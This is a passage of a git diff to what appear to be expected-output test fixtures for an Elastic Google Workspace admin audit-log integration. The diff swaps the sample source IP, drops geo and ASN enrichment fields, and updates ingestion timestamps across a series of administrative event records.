@@ -2025,7 +1611,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2049,35 +1635,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301271700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004946700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_RECOVERY_EMAIL", "id": "1", @@ -2114,7 +1682,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2138,35 +1706,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301273400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004951500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_RECOVERY_PHONE", "id": "1", @@ -2203,7 +1753,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2227,35 +1777,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301275100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004955300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_RELATION", "id": "1", @@ -2292,7 +1824,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2316,35 +1848,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301277Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004960300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_ADDRESS", "id": "1", @@ -2381,7 +1895,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -2405,35 +1919,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301278700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004966200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}",
 "provider": "admin",
 "action": "CREATE_EMAIL_MONITOR",
 "id": "1",
@@ -2470,7 +1966,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -2494,35 +1990,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301280400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004972Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}",
 "provider": "admin",
 "action": "CREATE_DATA_TRANSFER_REQUEST",
 "id": "1",
@@ -2559,7 +2037,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -2583,35 +2061,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301282200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004977700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "GRANT_DELEGATED_ADMIN_PRIVILEGES",
 "id": "1",
@@ -2648,7 +2108,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -2672,35 +2132,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301284Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}",
+ "ingested": "2021-12-09T13:38:57.004997400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}",
 "provider": "admin",
 "action": "DELETE_ACCOUNT_INFO_DUMP",
 "id": "1",
@@ -2737,7 +2179,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -2761,35 +2203,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301285700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005003Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}",
 "provider": "admin",
 "action": "DELETE_EMAIL_MONITOR",
 "id": "1",
@@ -2826,7 +2250,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -2850,35 +2274,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301287400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005008300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}",
 "provider": "admin",
 "action": "DELETE_MAILBOX_DUMP",
 "id": "1",
@@ -2915,7 +2321,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -2939,35 +2345,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301289100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005013600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_FIRST_NAME",
 "id": "1",
@@ -3004,7 +2392,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3028,35 +2416,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301290900Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005019200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}",
 "provider": "admin",
 "action": "GMAIL_RESET_USER",
 "id": "1",
@@ -3093,7 +2463,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3117,35 +2487,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301292600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:57.005024600Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "CHANGE_LAST_NAME",
 "id": "1",
@@ -3182,7 +2534,7 @@
 "user"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -3206,35 +2558,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.301294300Z",
